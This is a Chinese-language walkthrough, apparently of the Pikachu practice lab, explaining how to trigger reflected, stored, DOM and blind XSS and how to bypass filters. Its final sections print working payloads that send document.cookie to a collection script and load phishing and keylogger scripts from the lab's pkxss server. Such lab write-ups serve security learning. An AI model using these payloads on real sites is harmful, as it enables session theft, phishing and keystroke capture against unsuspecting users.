(一)反射型XSS
get型直接在url中输入payload即可
post型通过在表单中输入或者定位相应post变量直接传参payload即可
(二)存储型XSS
存储型XSS通过将payload提交到留言板中,之后每次访问该留言板都会触发它的script脚本
(三)DOM型XSS
通过观察发现可通过闭合HTML的方法来触发script脚本
(四)XSS盲打
输入后进入管理员后台查看
进入后即可发现遭到xss攻击
(五)XSS过滤
这里使用大小写绕过xss过滤
也可通过图片标签绕过过滤
(六)xss之htmlspecialchars
通过引号闭合html
(七)xss之href输出
通过javascript协议执行alert
(八)js输出
先使用</script>闭合它的script脚本,再写xss的script。
(九)cookie窃取
更改pikachu平台的xsspt中cookie.php中的重定向内容为目标网站地址
输入XSSpayload如下:
<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
cookie收集中可看到收集到的cookie
(十)钓鱼
修改fish.php中的参数网址为目标网址
输入XSSpayload如下:
<script src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php"></script>
在钓鱼记录中找到记录
(十一)键盘监控
输入payload:
<script src="http://127.0.0.1/pikachu/pkxss/rkeypress/rk.js">